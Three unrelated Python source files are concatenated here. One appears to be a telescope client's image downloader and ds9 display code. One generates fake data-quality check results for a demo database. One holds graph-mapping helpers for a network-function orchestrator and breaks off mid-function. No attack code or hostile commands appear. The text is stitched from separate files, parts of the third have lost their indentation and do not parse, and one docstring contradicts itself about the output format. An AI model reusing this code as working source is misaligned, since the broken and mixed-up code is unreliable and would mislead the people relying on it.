            # set up automatic ftp; we have all the info we need
            self.exposeModel.files.addCallback(self._updFiles)
    def _downloadFinished(self, camName, httpGet):
        """Handle completion of one image download: start the next pending
        download and, if image display is enabled and the download succeeded,
        show the file in the (possibly newly created) ds9 window for *camName*.
        """
        # print "%s._downloadFinished(camName=%s, httpGet=%s)" % (self.__class__.__name__, camName, httpGet)
        try:
            self.activeDownloads.remove(httpGet)
        except Exception:
            sys.stderr.write("FileGetter internal error: could not remove completed httpGet from activeDownloads\n")
        # start next download if current set finished
        self._handlePendingDownloads()
        # display image if display wanted and camera name known and download succeeded
        # print "viewImageVarCont=%r" % (self.exposeModel.viewImageVarCont.get())
        if self.exposeModel.viewImageVarCont.get() and (camName is not None) and (httpGet.state == httpGet.Done):
            ds9Win = self.ds9WinDict.get(camName)
            try:
                if not ds9Win:
                    if camName not in self.exposeModel.instInfo.camNames:
                        raise RuntimeError("Unknown camera name %r for %s" % (camName, self.instName))
                    # camName may be "" for single-camera instruments
                    if camName:
                        ds9Name = "%s_%s" % (self.instName, camName)
                    else:
                        ds9Name = self.instName
                    ds9Win = RO.DS9.DS9Win(ds9Name, doOpen=True)
                    self.ds9WinDict[camName] = ds9Win
                elif not ds9Win.isOpen():
                    ds9Win.doOpen()
                ds9Win.showFITSFile(httpGet.toPath)
            except Exception as e:
                self.tuiModel.logMsg(
                    msgStr = RO.StringUtil.strFromException(e),
                    severity = RO.Constants.sevError,
                )
    def _updFiles(self, fileInfo, isCurrent, keyVar):
        """Call whenever a file is written
        to start an ftp download (if appropriate).
        fileInfo consists of:
        - cmdr (progID.username)
        - host
        - common root directory
        - program and date subdirectory
        - user subdirectory
        - file name(s) for most recent exposure
        """
        if not isCurrent:
            return
        if not keyVar.isGenuine():
            # cached; avoid redownloading
            return
        # print "_updFiles(%r, %r)" % (fileInfo, isCurrent)
        getEveryNum = self.exposeModel.getEveryVarCont.get()
        if getEveryNum == 0:
            # no downloads wanted
            self.pendingDownloadArgs.clear()
            return
        cmdr, dumHost, dumFromRootDir, progDir, userDir = fileInfo[0:5]
        progID, username = cmdr.split(".")
        fileNames = fileInfo[5:]
        # download via the hub's HTTP root, not the host/dir reported in fileInfo
        host, fromRootDir = self.hubModel.httpRoot.get()[0]
        if None in (host, fromRootDir):
            errMsg = "Cannot download images; hub httpRoot keyword not available"
            self.tuiModel.logMsg(errMsg, RO.Constants.sevWarning)
            return
        if self.tuiModel.getProgID() not in (progID, "APO"):
            # files are for a different program; ignore them unless user is APO
            return
        if not self.exposeModel.getCollabPref.getValue() and username != self.tuiModel.getUsername():
            # files are for a collaborator and we don't want those
            return
        toRootDir = self.exposeModel.ftpSaveToPref.getValue()
        # save in userDir subdirectory of ftp directory
        argList = []
        for ii, fileName in enumerate(fileNames):
            # "None" (the string) marks a camera with no image this exposure
            if fileName == "None":
                continue
            dispStr = "".join((progDir, userDir, fileName))
            fromURL = "".join(("http://", host, fromRootDir, progDir, userDir, fileName))
            toPath = os.path.join(toRootDir, progDir, userDir, fileName)
            camName = RO.SeqUtil.get(self.exposeModel.instInfo.camNames, ii)
            doneFunc = RO.Alg.GenericCallback(self._downloadFinished, camName)
            if camName is None:
                # warn, but still queue the download (with camName=None)
                self.tuiModel.logMsg(
                    "More files than known cameras for image %s" % fileName,
                    severity = RO.Constants.sevWarning,
                )
            argList.append(dict(
                fromURL = fromURL,
                toPath = toPath,
                isBinary = True,
                overwrite = False,
                createDir = True,
                dispStr = dispStr,
                doneFunc = doneFunc,
            ))
        self.pendingDownloadArgs.append(argList)
        self._handlePendingDownloads()
    def _handlePendingDownloads(self):
        """Examine pending downloads and start the next download, if appropriate.

        getEvery semantics: 0 = download nothing; N > 0 = download every Nth
        queued exposure; N < 0 = download only the most recent and drop the rest.
        """
        # print "%s._handlePendingDownloads(); there are %s active and %s pending downloads" % \
        #    (self.__class__.__name__, len(self.activeDownloads), len(self.pendingDownloadArgs),)
        getEveryNum = self.exposeModel.getEveryVarCont.get()
        if getEveryNum == 0:
            # no downloads wanted
            # print "No downloads wanted; clearing pending downloads"
            self.pendingDownloadArgs.clear()
            return
        if self.activeDownloads:
            # make sure these are all truly active; this should never happen,
            # but the consequences are severe so be paranoid
            trulyActiveDownloads = [dl for dl in self.activeDownloads if not dl.isDone]
            if len(trulyActiveDownloads) != len(self.activeDownloads):
                # print "warning: purging activeDownloads of %d completed downloads" % \
                #    (len(self.activeDownloads) - len(trulyActiveDownloads))
                self.activeDownloads = set(trulyActiveDownloads)
        if self.activeDownloads:
            # print "There are %d active downloads; don't start a new one" % (len(self.activeDownloads),)
            return
        argList = []
        if getEveryNum > 0:
            # nToSkip = getEveryNum - 1
            nPending = len(self.pendingDownloadArgs)
            if nPending >= getEveryNum:
                # print "Purge first %d entries from pendingDownloads and download the next" % (getEveryNum-1,)
                # deques don't handle slicing, unfortunately
                for x in range(getEveryNum-1):
                    del(self.pendingDownloadArgs[0])
                argList = self.pendingDownloadArgs.popleft()
            # else:
            #     print "There are not enough pending downloads yet; waiting"
        elif getEveryNum < 0:
            # start most recent images; ditch the rest
            # print "Download last image in pending downloads and clear the rest"
            if self.pendingDownloadArgs:
                argList = self.pendingDownloadArgs.pop()
                self.pendingDownloadArgs.clear()
        for argDict in argList:
            httpGet = self.downloadWdg.getFile(**argDict)
            if not httpGet.isDone:
                try:
                    self.activeDownloads.add(httpGet)
                except Exception:
                    # print "self.activeDownloads=%r" % (self.activeDownloads,)
                    raise
| |
#!/usr/bin/env python2
""" Generate demo test-results data.
This program is used to create fake results from daily runs against a
hypothetical user database called "Westwind". This hypothetical
database has the following tables within it:
- cust_type - a small, non-partitioned lookup table with 5 rows
- asset_type - a small, non-partitioned lookup table with 5 rows
- cust_asset_events - a large, partitioned fact table
There are three tests for the two lookup tables, and six for the large
fact table that run daily. The program generates one run for every day
from 2015-01-01 to 2015-12-31. A small random number of tests will find
violations. The user tables that this demo creates tests for include:
- cust_type (~ 5 rows)
- asset_type (~ 5 rows)
- event_type (~ 5 rows)
- dates (~ 3650 rows)
- locations (tbd)
- customers (~ 10,000 rows)
- assets (~ 10,000,000 rows)
- cust_asset_events (~ 3,000,000,000 rows) = avg of 1 event/asset/day for 7 years
- cust_asset_event_month (~ 840,000,000 rows) = 1 row/asset/month for 7 years
This results data will be written by default to /tmp/inspector_demo.sqlite.
4380 records will be written to this comma-delimited csv file without
any quotes. The fields are in the following order:
- instance_name STRING (always 'prod')
- database_name STRING (always 'westwind')
- table_name STRING
- run_start_timestamp TIMESTAMP (YYYY-MM-DD HH:MM:SS)
- check_name STRING
- check_policy_type STRING ('quality' or 'data-management')
- check_type STRING ('rule')
- run_check_mode STRING ('full' or 'incremental')
- run_check_rc INTEGER (always 0)
- run_check_violation_cnt INTEGER
- run_check_scope INTEGER (0-100)
- run_check_unit STRING ('tables' or 'rows')
- run_check_severity_score INTEGER (0-100)
These fields were initially included but have been taken out for now:
#- table_partitioned INTEGER (1=True, 0=False)
#- run_mode STRING ('full' or 'incremental')
#- partition_key STRING ('' or 'date_id')
#- partition_value STRING (5-digit julian date for partitioned tables)
#- run_check_start_timestamp TIMESTAMP (YYYY-MM-DD HH:MM:SS)
#- run_check_end_timestamp TIMESTAMP (YYYY-MM-DD HH:MM:SS)
#- run_check_anomaly_score INTEGER (always 0)
This source code is protected by the BSD license. See the file "LICENSE"
in the source code root directory for the full language or refer to it here:
http://opensource.org/licenses/BSD-3-Clause
Copyright 2015 Will Farmer and Ken Farmer
"""
from __future__ import division
import os, sys
import random
import argparse
import time, datetime
from os.path import join as pjoin
from os.path import isfile, isdir, exists, dirname, basename
import csv
import random
import json
from pprint import pprint as pp
sys.path.insert(0, dirname(dirname(os.path.abspath(__file__))))
import hadoopinspector.core as core
__version__ = '0.0.2'
user_tables = {}
def main():
    """Entry point: load the per-instance/db table config, then generate
    the demo result file named on the command line."""
    global user_tables
    args = get_args()
    # config file name is derived from the instance and database names
    config_name = 'instance-%s_db-%s_config.json' % (args.user_instance,
                                                     args.user_db)
    if args.dirname:
        config_name = pjoin(args.dirname, config_name)
    with open(config_name, 'r') as config_file:
        user_tables = json.load(config_file)
    create_test_file(args.user_instance, args.user_db, args.outfile)
    print('Demo file created: %s' % args.outfile)
def create_test_file(user_instance, user_db, output_filename):
    """Generate a year's worth of demo check results and persist them.

    For every day of 2015 one run is simulated; each check of each table in
    the module-level ``user_tables`` config contributes one result record,
    written via ``core.CheckResults``.

    :param user_instance: instance name recorded with every result
    :param user_db:       database name recorded with every result
    :param output_filename: file the results are written to
    """
    for month_of_year in range(1, 13):
        print("generating month: %d" % month_of_year)
        for day_of_month in range(1, get_month_days(month_of_year) + 1):
            # 2015 matches the module documentation (the previous literal
            # 2014 was silently overridden inside get_run_start_datetime).
            run_start_datetime = get_run_start_datetime(2015, month_of_year,
                                                        day_of_month)
            check_results = core.CheckResults(output_filename)
            for table_name in user_tables:
                table = user_tables[table_name]
                for check_name in table['checks']:
                    check = table['checks'][check_name]
                    default_severity_name = check['severity']
                    default_severity_score = convert_severity(default_severity_name)
                    # BUGFIX: get_violation_cnt is random -- it was called
                    # twice, so the scope and the recorded count disagreed.
                    # Call it once and reuse the value.
                    violation_cnt = get_violation_cnt(table_name, check_name)
                    scope = get_scope(table['partition_key'],
                                      table['partition_row_cnt_avg'],
                                      check['violation_unit'],
                                      violation_cnt)
                    check_results.add(user_instance,
                                      user_db,
                                      table_name,
                                      check_name,
                                      violation_cnt,
                                      '0',
                                      'active',
                                      get_check_type(check['check_type']),
                                      get_check_policy_type(check['policy_type']),
                                      get_run_check_mode(table['mode'],
                                                         check['mode']),
                                      check['violation_unit'],
                                      scope,
                                      get_severity_score(default_severity_score,
                                                         scope),
                                      run_start_timestamp=run_start_datetime,
                                      run_stop_timestamp=(run_start_datetime
                                          + datetime.timedelta(hours=1)))
            # one sqlite flush per simulated day
            check_results.write_to_sqlite()
def get_violation_cnt(table_name, check_name):
    """Randomly generate a violation count for one check run.

    With probability ``failure_rate`` (config key, default 0.1) the check
    fails: table-unit checks report a single violation; row-unit checks
    report either the whole average row count (unpartitioned tables, half
    of the time) or a random fraction of it.

    Reads the module-level ``user_tables`` config.
    """
    partition_key = user_tables[table_name]['partition_key']
    avg_row_cnt = user_tables[table_name]['partition_row_cnt_avg']
    violation_unit = user_tables[table_name]['checks'][check_name]['violation_unit']
    failure_rate = user_tables[table_name]['checks'][check_name].get('failure_rate', 0.1)
    if random.random() >= failure_rate:
        return 0
    # BUGFIX: accept both spellings -- the output header and get_scope use
    # the plural 'tables' while this function only matched 'table'.
    if violation_unit in ('table', 'tables'):
        return 1
    if partition_key is None and random.random() < 0.5:
        # screwed up all the rows, probably because you reloaded 100% of
        # the data wrong. Maybe due to:
        #    - loaded same data twice
        #    - failed to load
        return int(avg_row_cnt)
    # screwed up a subset of rows, probably a subset of a single partition
    return int(avg_row_cnt * random.random())
def get_partition_value(run_mode, curr_datetime):
    """Return the julian-style 'YYYYDDD' partition value for a run.

    ``None`` is returned when ``run_mode`` is None (no partitioning).
    """
    if run_mode is None:
        return None
    time_parts = curr_datetime.timetuple()
    return '{:d}{:03d}'.format(time_parts.tm_year, time_parts.tm_yday)
def get_run_check_mode(run_mode, check_mode):
    """A run-check is incremental only if BOTH the table run mode and the
    check mode are incremental; anything else falls back to 'full'."""
    both_incremental = (run_mode == 'incremental'
                        and check_mode == 'incremental')
    return 'incremental' if both_incremental else 'full'
def convert_severity(in_val):
    """Map a severity name (None|'low'|'medium'|'high') to a 0-100 score.

    Prints an error and exits the program on any other value.
    """
    for name, score in ((None, 0), ('low', 10), ('medium', 50), ('high', 100)):
        if in_val == name:
            return score
    print('error: invalid convert_severity in_val: %s' % in_val)
    sys.exit(1)
def get_scope(partition_key, avg_row_cnt, violation_unit, violation_cnt):
    """ Returns the scope of the violations.
        Range is 0 to 100 - 100 being the greatest scope

    :param partition_key: None for unpartitioned tables
    :param avg_row_cnt:   average row count per partition (or per table)
    :param violation_unit: 'table'/'tables' or 'rows'
    :param violation_cnt: number of violations found by the check
    """
    assert isnumeric(violation_cnt)
    assert isnumeric(avg_row_cnt)
    if not violation_cnt:
        return 0
    # BUGFIX: also match the singular 'table' emitted by get_violation_cnt;
    # previously only the documented plural 'tables' hit this branch.
    elif violation_unit in ('table', 'tables'):
        return 100
    else:
        # true division is in effect ("from __future__ import division")
        if partition_key is None:
            return (violation_cnt / avg_row_cnt) * 100
        else:
            # assumes 100 partitions, or maybe more but recent
            # data is more valuable
            return (violation_cnt / avg_row_cnt)
def get_severity_score(default_severity_score, scope):
    """ Returns the severity of the violations.
        Range is 0 to 100 - 100 being the most severe.

    The default score is weighted by the scope; any non-zero result is
    clamped into [1, 100] and truncated to an int.
    """
    assert isnumeric(default_severity_score)
    assert isnumeric(scope)
    weighted = (scope * default_severity_score) / 100
    if not weighted:
        return 0
    return int(max(1, min(100, weighted)))
def get_partition_key(raw_partition_key):
    """Normalize a missing (None) partition key to an empty string."""
    return '' if raw_partition_key is None else raw_partition_key
def get_instance_name():
    """The demo always reports results for the 'prod' instance."""
    return 'prod'
def get_database_name():
    """The demo always reports results for the 'westwind' database."""
    return 'westwind'
def get_table_partitioned(partition_key):
    """Return '1' when a non-empty partition key is present, else '0'."""
    has_key = partition_key is not None and partition_key != ''
    return '1' if has_key else '0'
def get_run_start_datetime(year, month, day):
    """Return the simulated run start: 02:00:00 on the given date.

    BUGFIX: the ``year`` argument was previously ignored (2015 was
    hard-coded), so callers could not control the generated year.
    """
    hour = 2
    minute = 0
    second = 0
    return datetime.datetime(year, month, day, hour, minute, second)
def get_ts_from_dt(dt):
    """Format a datetime as 'YYYY-MM-DD HH:MM:SS'."""
    return dt.strftime('%Y-%m-%d %H:%M:%S')
def get_curr_datetime(curr_datetime, run_start_datetime):
    """Advance the per-check timestamp within a run.

    Returns the run start the first time it is used for a day (or ever),
    otherwise one second after the previous timestamp.
    """
    if curr_datetime is None or curr_datetime <= run_start_datetime:
        # first ever use, or first use within this day
        return run_start_datetime
    return curr_datetime + datetime.timedelta(seconds=1)
def get_month_days(month_of_year):
    """Day count for a month of a non-leap year (February is always 28;
    unknown month numbers fall through to 30, as before)."""
    if month_of_year == 2:
        return 28
    if month_of_year in (1, 3, 5, 7, 8, 10, 12):
        return 31
    return 30
def get_check_policy_type(raw_check_policy_type):
    """Pass-through: the config value is already in output format."""
    return raw_check_policy_type
def get_check_type(raw_check_type):
    """Pass-through: the config value is already in output format."""
    return raw_check_type
def isnumeric(val):
    """True when ``int(val)`` succeeds, False otherwise."""
    try:
        int(val)
        return True
    except (TypeError, ValueError):
        return False
def get_args():
    """Parse command line arguments.

    --long-help prints the module docstring and exits with status 0.
    """
    parser = argparse.ArgumentParser(description='Generates demo data')
    parser.add_argument('outfile', help='output file to append to')
    parser.add_argument('--version', action='version', version=__version__,
                        help='displays version number')
    parser.add_argument('--long-help', action='store_true',
                        help='Provides more verbose help')
    parser.add_argument('--user-instance',
                        choices=['prod', 'prodfailover', 'staging', 'dev'],
                        required=True)
    parser.add_argument('--user-db', choices=['AssetUserEvents'],
                        required=True)
    parser.add_argument('--dirname', help='path to config files')
    args = parser.parse_args()
    if args.long_help:
        print(__doc__)
        sys.exit(0)
    return args
if __name__ == '__main__':
    # main() returns None, so this exits with status 0 on success.
    sys.exit(main())
| |
# Copyright 2017 Balazs Nemeth
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Collects miscellaneous functions to support the mapping algorithm.
Common source of providing a logging object and importing the NFFG library
for all algorithm files.
"""
import ast
import copy
import logging
from heapq import heappush, heappop
from itertools import count
import UnifyExceptionTypes as uet
from ServiceChains import EndToEndChain
try:
# runs when mapping files are called from ESCAPE
from escape.nffg_lib.nffg import NFFG, NFFGToolBox
except ImportError:
# runs when mapping repo is cloned individually, and NFFG lib is in a
# sibling directory. WARNING: circular import is not avoided by design.
import site
site.addsitedir('..')
from nffg_lib.nffg import NFFG, NFFGToolBox
# Basic logger for mapping
log = logging.getLogger("mapping")
# Default log level
# Change this constant to set logging level outside of ESCAPE
DEFAULT_LOG_LEVEL = logging.DEBUG
# print "effective level", log.getEffectiveLevel()
# print "log level", log.level
# ESCAPE uses INFO and DEBUG levels. The default level of a logger is WARNING.
if log.getEffectiveLevel() >= logging.WARNING:
# If the RootLogger is not configured, setup a basic config here
logging.basicConfig(format='%(levelname)s:%(name)s:%(message)s',
level=DEFAULT_LOG_LEVEL)
# value to be considered zero, when checking against division by zero
zero_float_value = 1e-8
class InfraIsNotAGoodCandidateForHosting(Exception):
  """Signals that an infra node was ruled out as a hosting candidate."""
  pass
def shortestPathsBasedOnEdgeWeight (G, source, weight='weight', target=None,
                                    cutoff=None, routing_criteria=None,
                                    forbidden_links=None):
  """
  Calculates shortest paths, and returns all link ID-s of that path.
  Taken and modified from NetworkX source code,
  the function originally 'was single_source_dijkstra',
  now it returns the key edge data too.
  If a weight doesn't exist let's be permissive and give it 0 weight.

  :param routing_criteria: allows the usage of these nodes only
  :type cutoff: float limit on path length to terminate
  :type target: str target node ID
  :type weight: str link weight string to be used
  :type source: str source node ID
  :param forbidden_links: links which cannot be used by the paths
  :return: (paths, edgekeys) dicts keyed by reached node ID; paths maps to
    node ID lists, edgekeys to the corresponding link ID lists
  """
  # degenerate case: the empty path
  if source == target:
    return {source: [source]}, {source: []}
  push = heappush
  pop = heappop
  dist = {}  # dictionary of final distances
  paths = {source: [source]}  # dictionary of paths
  # dictionary of edge key lists of corresponding paths
  edgekeys = {source: []}
  # node weights count into the distance too; SAP nodes weigh nothing
  # NOTE(review): getattr reads an *attribute* named `weight` off the NFFG
  # node object (not a dict key) -- assumes nodes expose it; confirm.
  selfweight = (getattr(G.node[source], weight, 0) if
                G.node[source].type != 'SAP' else 0)
  seen = {source: selfweight}
  c = count()  # tie-breaker so the heap never compares node objects
  fringe = []  # use heapq with (distance,label) tuples
  push(fringe, (selfweight, next(c), source))
  while fringe:
    (d, _, v) = pop(fringe)
    if v in dist:
      continue  # already searched this node.
    dist[v] = d
    if v == target:
      break
    # for ignore,w,edgedata in G.edges_iter(v,data=True):
    # is about 30% slower than the following
    edata = []
    for w, keydata in G[v].items():
      neighbourdata = []
      if routing_criteria is not None:
        # only the allowed nodes may be traversed
        if w not in routing_criteria:
          continue
      for k, dd in keydata.items():
        if not hasattr(dd, weight):
          raise uet.BadInputException(
            "Link %s should have edge attribute %s" % (k, weight),
            "Link %s is %s" % (k, dd))
        if forbidden_links is not None:
          if k in forbidden_links:
            continue
        neighbourdata.append((getattr(dd, weight), k))
      # keep only the cheapest parallel link towards each neighbour
      if len(neighbourdata) > 0:
        minweight, edgekey = min(neighbourdata, key=lambda t: t[0])
        edata.append((w, edgekey, {weight: minweight}))
    for w, ekey, edgedata in edata:
      # node weight of the neighbour (SAPs are free) plus the link weight
      if G.node[w].type == 'SAP':
        tempweight = 0
      else:
        tempweight = getattr(G.node[w], weight, 0)
      vw_dist = dist[v] + tempweight + edgedata[weight]
      if cutoff is not None:
        if vw_dist > cutoff:
          continue
      if w in dist:
        if vw_dist < dist[w]:
          raise ValueError('Contradictory paths found:', 'negative weights?')
      elif w not in seen or vw_dist < seen[w]:
        seen[w] = vw_dist
        push(fringe, (vw_dist, next(c), w))
        paths[w] = paths[v] + [w]
        edgekeys[w] = edgekeys[v] + [ekey]
  log.debug("Calculated distances from %s based on %s: %s" %
            (source, weight, dist))
  return paths, edgekeys
def retrieveE2EServiceChainsFromEdgeReqs (request):
  """
  Processes the service graph to retrieve the SC information and deletes the
  corresponding EdgeReq links from the SG.

  :param request: The service graph which contains EdgeReqs
  :return: a list of SC-s in format used by Algorithm1
  :raises uet.BadInputException: on empty or inconsistent EdgeReq.sg_path
  """
  chainlist = []
  cid = 1
  edgereqlist = []
  # collect and remove every EdgeReq from the service graph
  for req in request.reqs:
    edgereqlist.append(req)
    request.del_edge(req.src, req.dst, req.id)
  # construct chains from EdgeReqs
  for req in edgereqlist:
    if len(req.sg_path) == 1:
      # then add it as linklocal req instead of E2E req
      log.info("Interpreting one SGHop long EdgeReq (id: %s) as link "
               "requirement on SGHop: %s." % (req.id, req.sg_path[0]))
      reqlink = None
      for sg_link in request.sg_hops:
        if sg_link.id == req.sg_path[0]:
          reqlink = sg_link
          break
      if reqlink is None:
        # BUGFIX: the %s placeholder had no argument, and execution fell
        # through to setattr(None, ...) below, raising AttributeError.
        log.warn("EdgeSGLink object not found for EdgeSGLink ID %s! "
                 "(maybe ID-s stored in EdgeReq.sg_path are not the "
                 "same type as EdgeSGLink ID-s?)" % req.sg_path[0])
        continue
      if req.delay is not None:
        setattr(reqlink, 'delay', req.delay)
      if req.bandwidth is not None:
        setattr(reqlink, 'bandwidth', req.bandwidth)
    elif len(req.sg_path) == 0:
      raise uet.BadInputException(
        "If EdgeReq is given, it should specify which SGHop path does it "
        "apply to", "Empty SGHop path was given to %s EdgeReq!" % req.id)
    else:
      try:
        # if delay is None it is handled by the EndToEndChain constructor
        chain = {'id': cid, 'link_ids': req.sg_path,
                 'bandwidth': req.bandwidth if req.bandwidth is not None else 0,
                 'delay': req.delay}
      except AttributeError:
        raise uet.BadInputException(
          "EdgeReq attributes are: sg_path, bandwidth, delay",
          "Missing attribute of EdgeReq")
      # reconstruct NF path from EdgeSGLink path
      nf_chain = []
      for reqlinkid in req.sg_path:
        # find EdgeSGLink object of 'reqlinkid' (for-else raises when it
        # is not present in the request)
        reqlink = None
        for sg_link in request.sg_hops:
          if sg_link.id == reqlinkid:
            reqlink = sg_link
            break
        else:
          raise uet.BadInputException(
            "Elements of EdgeReq.sg_path should be EdgeSGLink.id-s.",
            "SG link %s couldn't be found in input request NFFG" % reqlinkid)
        # add the source node id of the EdgeSGLink to NF path
        nf_chain.append(reqlink.src.node.id)
        # add the destination node id of the last EdgeSGLink to NF path
        if reqlinkid == req.sg_path[-1]:
          if reqlink.dst.node.id != req.dst.node.id:
            raise uet.BadInputException(
              "EdgeReq.sg_path should select a path between its two ends",
              "Last NF (%s) of EdgeReq.sg_path and destination of EdgeReq ("
              "%s) are not the same!" % (reqlink.dst.node.id, req.dst.node.id))
          nf_chain.append(reqlink.dst.node.id)
        # validate the beginning and ending of EdgeReq path
        if reqlinkid == req.sg_path[0] and \
              reqlink.src.node.id != req.src.node.id or \
              reqlinkid == req.sg_path[-1] and \
              reqlink.dst.node.id != req.dst.node.id:
          raise uet.BadInputException(
            "EdgeReq.sg_path should select a path between its two ends",
            "First NF (%s) of EdgeReq.sg_path and source of EdgeReq (%s) are "
            "not the same!" % (reqlink.src.node.id, req.src.node.id))
      # check if it is not an E2E chain (link-wise requirements are already
      # added to SGHops)
      if request.network.node[nf_chain[0]].type != 'SAP' or \
            request.network.node[nf_chain[-1]].type != 'SAP':
        raise uet.BadInputException("All EdgeReqs should be between SAPs, not"
                                    " E2E requirement paths are not supported yet",
                                    "Path of EdgeReq is %s"%nf_chain)
      chain['chain'] = nf_chain
      cid += 1
      chainlist.append(EndToEndChain(**chain))
  return chainlist
def substituteMissingValues (net):
  """
  Checks all resource parameters in the substrate network and substitutes the
  missing ones with either infinity or zero depending on the resource type,
  which means permissive behaviour. Modifies the input NFFG

  :type net: :class:`NFFG`
  :param net: substrate network NFFG to process
  :return: the modified NFFG
  """
  # if some resource value is not set (is None) then be permissive and set it
  # to a comfortable value.
  for respar in ('cpu', 'mem', 'storage', 'delay', 'bandwidth'):
    for n in net.infras:
      if n.resources[respar] is None:
        if respar == 'delay':
          # a missing delay defaults to 0 (infinity would forbid the node)
          log.warn("Resource parameter %s is not given in %s, "
                   "substituting with 0!" % (respar, n.id))
          n.resources[respar] = 0
        else:
          # capacity-like parameters default to unlimited
          log.warn("Resource parameter %s is not given in %s, "
                   "substituting with infinity!" % (respar, n.id))
          n.resources[respar] = float("inf")
  # If link res is None or doesn't exist, replace it with a neutral value.
  for i, j, d in net.network.edges_iter(data=True):
    if d.type == 'STATIC':
      if getattr(d, 'delay', None) is None:
        # the warning is suppressed for SAP-adjacent links
        # NOTE(review): original nesting is ambiguous -- confirm whether the
        # substitution itself should also be skipped for SAP links.
        if d.src.node.type != 'SAP' and d.dst.node.type != 'SAP':
          log.warn("Resource parameter delay is not given in link %s "
                   "substituting with zero!" % d.id)
        setattr(d, 'delay', 0)
      if getattr(d, 'bandwidth', None) is None:
        if d.src.node.type != 'SAP' and d.dst.node.type != 'SAP':
          log.warn("Resource parameter bandwidth is not given in link %s "
                   "substituting with infinity!" % d.id)
        setattr(d, 'bandwidth', float("inf"))
  return net
def purgeNFFGFromInfinityValues (nffg):
  """
  Before running the algorithm, None values for resources were replaced by
  Infinity value to ensure seamless mapping, in case of missing parameters.
  These values should be set back to None to cooperate with surrounding layers.
  (zero values do not cause errors, and they can't be placed back unabiguously)

  :type nffg: NFFG object to purge.
  """
  # node resources: inf -> None
  purge = False
  for respar in ('cpu', 'mem', 'storage', 'bandwidth'):
    for n in nffg.infras:
      # NOTE(review): hasattr checks an *attribute* named respar on the
      # resources object while the next line indexes it -- assumes the NFFG
      # resource container supports both access styles; confirm.
      if hasattr(n.resources, respar):
        if n.resources[respar] == float("inf"):
          n.resources[respar] = None
          purge = True
  if purge:
    log.info("Purging node resource data of output NFFG from Infinity "
             "values was required.")
  purge = False
  # static link bandwidth: inf -> None
  for i, j, d in nffg.network.edges_iter(data=True):
    if d.type == 'STATIC':
      if hasattr(d, 'bandwidth'):
        if d.bandwidth == float("inf"):
          d.bandwidth = None
          purge = True
  if purge:
    log.info("Purging link resource of output NFFG from Infinity values"
             " was required.")
def _checkIfThereIsAnchorPoint(request):
"""
Checks if the request graph is connected to any SAP by any SGHop.
:return:
"""
for sg in request.sg_hops:
if sg.src.node.type == 'SAP' or sg.dst.node.type == 'SAP':
return True
return False
def _gatherConsumerProviderDictFromNFFG (nffg):
  """
  Extracts the consumer and provider ports from an nffg (either request or
  network) for later processing.

  :param nffg: request or substrate NFFG to scan
  :return: dict mapping SAP service id -> ([consumer ports], [provider ports])
  """
  cons_prov_service_ids = {}
  for node_id in nffg.network.nodes():
    # only SAP and NF ports can take part in consumer/provider relations
    if nffg.network.node[node_id].type in ('SAP', 'NF'):
      for p in nffg.network.node[node_id].ports:
        if p.sap is not None:
          if p.sap not in cons_prov_service_ids:
            # tuple of lists of consumers and providers respectively
            cons_prov_service_ids[p.sap] = ([], [])
          if p.role == NFFG.PORT_ROLE_PROVIDER:
            cons_prov_service_ids[p.sap][1].append(p)
          if p.role == NFFG.PORT_ROLE_CONSUMER:
            cons_prov_service_ids[p.sap][0].append(p)
  # keep only the ones which has at least one provider or consumer port.
  # (Python 2 style: iteritems; filter yields (sap_id, (consumers, providers)))
  cons_prov_service_ids = dict(filter(lambda t:
                                      len(t[1][0]) > 0 or len(t[1][1]) > 0,
                                      cons_prov_service_ids.iteritems()))
  log.debug("Consumer, provider VNF ports detected respectively: %s in NFFG %s"
            %(cons_prov_service_ids, nffg.id))
  return cons_prov_service_ids
def checkAndPrepareConsumerProviderSAPSetting(request, network):
  """
  Checks if there is any consumer or provider NF port in the request NFFG.
  Raises exception if any unsupported status is found.
  It is not allowed to have a provider and a consumer in the request for the
  same SAP data (the providers and the consumers of a service should be mapped
  in separate orchestrations). Proper handling of these would need more
  sophisticated modifications in the backtracking procedure.
  Raises BadInputException if this invalid setting is found.
  In case there is no anchor point (connection to SAP) checks if there is an
  anchor point provided by an unambiguously connectable consumer SAP.

  :param request: NFFG object to process.
  :param network: substrate NFFG; may be modified by first-fit anchoring.
  :return: the (possibly modified) network NFFG
  """
  request_cons_prov_dict = _gatherConsumerProviderDictFromNFFG(request)
  network_cons_prov_dict = _gatherConsumerProviderDictFromNFFG(network)
  for k, v in request_cons_prov_dict.iteritems():
    # we filter for VNFs from the provider list, because SAPs can be mapped
    # unambiguously anyway.
    if len(v[0])>0 and len(filter(lambda port: port.node.type == 'NF', v[1]))>0:
      raise uet.BadInputException(
        "From one consumer-provider SAP service only consumers or only "
        "providers should be present in the request VNFs",
        "Service id %s has both consumers: %s and providers: %s" % (
          k, v[0], v[1]))
  if not _checkIfThereIsAnchorPoint(request):
    log.info("Hanging service graph request detected, trying to find anchor "
             "point based on consumer SAP mapping.")
    # services consumed exactly once in the request
    only_one_consumer_in_req = list(filter(lambda t: len(t[1][0]) == 1,
                                           request_cons_prov_dict.iteritems()))
    if len(only_one_consumer_in_req) == 0:
      raise uet.BadInputException("There should be a consumer SAP whose service "
                                  "is not consumed anywhere else in the service "
                                  "graph", "Couldn't find such consumer SAP")
    elif len(only_one_consumer_in_req) > 1:
      # map to only the consumer SAP ID-s
      unique_consumer_sap_ids = map(lambda t: t[0], only_one_consumer_in_req)
      # filter the unique consumer SAP ID-s which have only one provider.
      unambiguously_mappable_consumers = list(filter(lambda t,
                                                     allowed=unique_consumer_sap_ids:
                                                     t[0] in allowed and len(t[1][1]) == 1,
                                                     network_cons_prov_dict.iteritems()))
      if len(unambiguously_mappable_consumers) == 0:
        raise uet.BadInputException("Among the unique consumer SAP IDs %s there"
                                    " should be one which can be mapped "
                                    "unambiguously"%unique_consumer_sap_ids,
                                    "Provider SAPs in the network provide less "
                                    "or more than one mapping possibilities for"
                                    " each of them: %s"%network_cons_prov_dict)
      elif len(unambiguously_mappable_consumers) > 1:
        log.debug("There are more consumer SAPs which can be mapped "
                  "unambiguously: %s"%unambiguously_mappable_consumers)
      # NOTE(review): every unambiguously mappable consumer is anchored (not
